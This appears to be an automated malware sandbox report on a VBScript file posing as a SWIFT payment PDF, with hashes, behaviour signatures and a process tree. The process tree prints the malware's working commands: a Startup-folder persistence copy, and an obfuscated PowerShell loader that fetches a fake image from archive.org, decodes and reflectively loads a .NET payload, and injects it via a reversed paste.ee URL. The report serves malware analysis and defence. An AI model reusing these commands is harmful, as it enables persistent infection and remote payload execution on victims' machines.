Overview

overview

10

Static

static

1

SWIFT 103 ...df.vbs

windows7-x64

10

SWIFT 103 ...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    101s
  • max time network
    30s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    08-10-2024 07:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SWIFT 103 202410071519130850 071024.pdf.vbs

  • Size

    193KB

  • MD5

    377669c2284f0c7020ff08d85250bd17

  • SHA1

    a32a1e200df0818b9a3b8c156354406c0e3f8909

  • SHA256

    62cd3c0fbbb28a44e83d0b403dea992fa9e0e25243ddeab961282de490f2b928

  • SHA512

    c0fddbc341c92079427d8d55a0b3b9a2ac4c8a3b4790cf04dfad47d3715f510dd975b14cccd365077ed6e21628bd0911d98fa52ab2b58547e6c3f4f9012313f0

  • SSDEEP

    3072:QSwp19rv+/CtALCVUwxgt5p7GwXvpiE6TLXnUXmaHNTjE:Qz79rmKeeuwFXnhQNT4

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg%20
exe.dropper

https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg%20

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

    execution
  • Drops startup file 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202410071519130850 071024.pdf.vbs"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:1848
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202410071519130850 071024.pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.eluacidun.vbs')')
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:436
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.1 -n 10
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2212
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202410071519130850 071024.pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.eluacidun.vbs')')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3068
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSB7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3RlX1YuanBnIHsnKycwfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0ICcrJ1N5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltYWdlQnl0ZXMgPSB7MX13ZWJDbGknKydlbnQuRG93bmxvYWREYXRhKHsxfWltYScrJ2dlVXJsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGUnKydtLlRleHQuRW5jb2RpbmddOjpVJysnVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5JysndGVzKTt7MScrJ31zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVD4+ezB9O3sxfWVuZEZsYWcgPScrJyB7MH08PEJBU0U2NCcrJ19FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hJysnZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC5JbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZ3QgezEnKyd9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4JysnICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZScrJ25kSW5kZXggLScrJyB7MX1zdGFydEluZGV4O3sxfWJhc2U2NCcrJ0NvbScrJ21hbmQgPSB7MX1pJysnbWFnZScrJ1RleHQuU3Vic3RyaW5nJysnKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZScrJ3J0XTo6RnJvbUJhc2U2NFN0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sbycrJ2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoeycrJzF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QnKycgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfTAnKycvWnV0Z1AnKycvZC8nKydlZS5ldHNhcC8vOnNwdHRoezB9JysnLCB7MH1kZXNhdGl2YWRvezB9LCB7MH1kZXNhdCcrJ2l2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH1BZGRJblByb2Nlc3MzMnswfSwgezB9ZGVzYXRpdmFkb3swfSwnKycgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiAgW0NoQXJdMzksW0NoQXJdMzYpfC4gKCAkUFNob21FWzRdKyRwU0hPTWVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2808
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = {0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg {'+'0};{1}webClient = New-Object '+'System.Net.WebClient;{1}imageBytes = {1}webCli'+'ent.DownloadData({1}ima'+'geUrl);{1}imageText = [Syste'+'m.Text.Encoding]::U'+'TF8.GetString({1}imageBy'+'tes);{1'+'}startFlag = {0}<<BASE64_START>>{0};{1}endFlag ='+' {0}<<BASE64'+'_END>>{0};{1}startIndex = {1}ima'+'geText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.IndexOf({1}endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1'+'}startIndex;{1}startIndex'+' += {1}startFlag.Length;{1}base64Length = {1}e'+'ndIndex -'+' {1}startIndex;{1}base64'+'Com'+'mand = {1}i'+'mage'+'Text.Substring'+'({1}startIndex, {1}base64Length);{1}commandBytes = [System.Conve'+'rt]::FromBase64String({1}base64Command);{1}lo'+'adedAssembly = [System.Reflection.Assembly]::Load({'+'1}commandBytes);{1}vaiMethod'+' = [dnlib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}0'+'/ZutgP'+'/d/'+'ee.etsap//:sptth{0}'+', {0}desativado{0}, {0}desat'+'ivado{0}, {0}desativado{0}, {0}AddInProcess32{0}, {0}desativado{0},'+' {0}desativado{0}));') -F [ChAr]39,[ChAr]36)|. ( $PShomE[4]+$pSHOMe[30]+'x')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1968

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    8b8873874af967e4aa26daff7a2c777c

    SHA1

    5d4828fd84fb63be6873744b0b7b271a63f2fe40

    SHA256

    40c0d4c551bbd84653c125df3d5403dad0d975a35a34c1de1c227e6c55bf0dd1

    SHA512

    af1563669b8ed983eb5a84fdd1b0ecd9dfb283af2da108a5fb0df8af36c15c23407321d66e7eef213b19b3658ed17c37a50f70d879ecbbfaa436e4d0f686863a

    Download Submit

  • memory/2808-20-0x0000000001E70000-0x0000000001E78000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2808-19-0x000000001B200000-0x000000001B4E2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/3068-7-0x00000000022A0000-0x00000000022A8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/3068-10-0x000007FEF6050000-0x000007FEF69ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3068-12-0x000007FEF6050000-0x000007FEF69ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3068-11-0x000007FEF6050000-0x000007FEF69ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3068-13-0x000007FEF6050000-0x000007FEF69ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3068-9-0x000007FEF6050000-0x000007FEF69ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3068-5-0x000007FEF630E000-0x000007FEF630F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3068-8-0x000007FEF6050000-0x000007FEF69ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3068-6-0x000000001B210000-0x000000001B4F2000-memory.dmp

    Filesize

    2.9MB

    Download